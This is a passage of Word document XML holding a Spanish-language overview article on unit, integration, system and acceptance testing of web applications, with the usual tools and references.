        <w:t>En la era digital actual, las aplicaciones web se han convertido en herramientas indispensables para empresas, gobiernos y usuarios finales. Garantizar su correcto funcionamiento no es solo una buena práctica, sino una necesidad crítica. El proceso de pruebas en el desarrollo de software web juega un papel esencial para asegurar que las aplicaciones cumplan con los requisitos funcionales, sean robustas y ofrezcan una experiencia de usuario óptima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F698D55" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Este artículo explora los diferentes niveles de pruebas en el ciclo de vida del desarrollo de software, destacando su importancia y cómo contribuyen a la calidad final del producto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5FC48D" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pruebas Unitarias: La Base de la Calidad del Código</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18044ACA" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El primer nivel en el proceso de pruebas son las </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pruebas unitarias</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>también conocidas como pruebas de componentes. En esta fase, los desarrolladores examinan unidades individuales de código—como funciones, métodos o clases—de manera aislada. El objetivo es verificar que cada componente opere según lo esperado antes de integrarse con otros módulos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B5DAB5" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Las pruebas unitarias son ideales para la </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>automatización</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, permitiendo una ejecución rápida y frecuente durante el desarrollo. Herramientas como </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>JUnit (Java), pytest (Python) y Mocha (JavaScript)</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> facilitan este proceso, integrando las pruebas en pipelines de CI/CD (Integración Continua/Despliegue Continuo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16943BDB" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00EC1890" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:r w:rsidRPr="00EC1890">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Beneficios clave:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC8FBD4" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00EC1890" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00104664">
        <w:t>Detección temprana de errores</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1890">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C71C17D" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Facilita el mantenimiento y refactorización del código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6318D191" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Reduce costos al corregir fallos en etapas iniciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2C9CF0" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pruebas de Integración: Verificando la Comunicación entre Componentes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8D874B" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez validadas las unidades individuales, el siguiente paso es asegurar que funcionen correctamente en conjunto. </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Las </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pruebas de integración</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> evalúan la interacción entre módulos, servicios o sistemas externos (como APIs o bases de datos).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C157F" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un error común en esta etapa es la </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>incompatibilidad de interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, donde componentes que funcionan bien por separado fallan al interactuar. Por ejemplo, un microservicio que espera un formato JSON específico podría fallar si otro módulo envía datos en un esquema distinto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35218D64" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00EC1890" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:r w:rsidRPr="00EC1890">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Estrategias comunes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633A1084" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pruebas de contrato (Contract Testing):</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> Asegura que los servicios cumplan con los acuerdos de comunicación definidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459873F7" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pruebas de extremo a extremo (E2E) básicas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> Valida flujos críticos entre subsistemas antes de pasar a pruebas más exhaustivas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A5A6AC" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pruebas de Sistema: Evaluando el Comportamiento Global</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F7C317" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Las </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pruebas de sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> examinan la aplicación como un todo, simulando condiciones reales de uso. Aquí no solo se verifica la funcionalidad, sino también aspectos como:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79042271" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Rendimiento:</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> ¿La aplicación maneja adecuadamente cargas de usuarios?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAA4821" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00EC1890" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC1890">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Seguridad:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1890">
        <w:t> ¿Existen vulnerabilidades explotables?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559DF639" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Usabilidad:</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> ¿La interfaz es intuitiva y accesible?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FBD98D" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Técnicas como </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pruebas de carga (JMeter, Gatling)</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> y </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>análisis de seguridad (OWASP ZAP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> son fundamentales en esta fase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5BED5" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pruebas de Aceptación: La Voz del Usuario Final</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A06A53B" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00EC1890" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La última barrera antes del despliegue son las </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pruebas de aceptación</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, donde se valida si el software cumple con las expectativas del cliente y los usuarios finales. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1890">
        <w:t>Estas pruebas pueden ser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFD9696" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00EC1890" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC1890">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Formales (UAT - User Acceptance Testing):</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1890">
        <w:t> Realizadas por stakeholders o clientes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A86BD47" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Informales (Beta Testing):</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> Feedback de usuarios reales en entornos controlados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E181CE4" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El feedback obtenido aquí es invaluable, ya que puede revelar problemas de diseño o requisitos mal interpretados que no fueron detectados en fases anteriores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E193756" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00B52F07" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086CB649" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Las pruebas en el desarrollo de software web no son un paso opcional, sino un </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pilar de la calidad</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Desde las pruebas unitarias hasta las de aceptación, cada nivel juega un rol crítico en la entrega de un producto robusto y confiable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D99D267" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">La automatización, junto con metodologías ágiles y DevOps, ha revolucionado este campo, permitiendo </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ciclos de retroalimentación más rápidos y eficientes. Sin embargo, el factor humano sigue siendo irremplazable, especialmente en la interpretación de resultados y la toma de decisiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129A8FD" w14:textId="17BC8180" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Invertir en un proceso de pruebas bien estructurado no solo reduce riesgos,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sino que también </w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>aumenta la satisfacción del usuario final</w:t>
      </w:r>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, factor determinante para el éxito de cualquier aplicación web en el competitivo mercado actual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D80526" w14:textId="77777777" w:rsidR="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C1123D" w14:textId="27222AFD" w:rsidR="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:sectPr w:rsidR="00737B42" w:rsidSect="00737B42">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:num="2" w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5644B725" w14:textId="7226ACD3" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1466126E" w14:textId="77777777" w:rsidR="00737B42" w:rsidRPr="00B52F07" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:sectPr w:rsidR="00737B42" w:rsidRPr="00B52F07" w:rsidSect="00737B42">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8D3679" w14:textId="2EBFEFFA" w:rsidR="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Referencias </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746BCDB5" w14:textId="77777777" w:rsidR="001844ED" w:rsidRDefault="001844ED" w:rsidP="00737B42">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:sectPr w:rsidR="001844ED" w:rsidSect="00737B42">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D53D14B" w14:textId="7E6E9C36" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:t>IEEE Standard for Software Testing (IEEE 829)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1509C066" w14:textId="519F7FC6" w:rsidR="00737B42" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00737B42">
        <w:t>OWASP Testing Guide (owasp.org)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD8FE04" w14:textId="77777777" w:rsidR="001844ED" w:rsidRPr="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001844ED">
        <w:t>"Software Testing: Principles and Practices" by Srinivasan Desikan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02D045" w14:textId="77777777" w:rsidR="001844ED" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:sectPr w:rsidR="001844ED" w:rsidSect="001844ED">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:num="2" w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF5AE89" w14:textId="66BF8FF6" w:rsidR="001844ED" w:rsidRPr="00737B42" w:rsidRDefault="001844ED" w:rsidP="001844ED">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1668990F" w14:textId="45C49783" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="21F545DF" w14:textId="59864836" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="0F8D3568" w14:textId="37469EF0" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="2B4C33F5" w14:textId="2571FE85" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="213DF6DB" w14:textId="6133EE6C" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="204E8E49" w14:textId="00B55353" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
    <w:p w14:paraId="474A5199" w14:textId="09292823" w:rsidR="00737B42" w:rsidRPr="00737B42" w:rsidRDefault="00737B42" w:rsidP="00737B42"/>
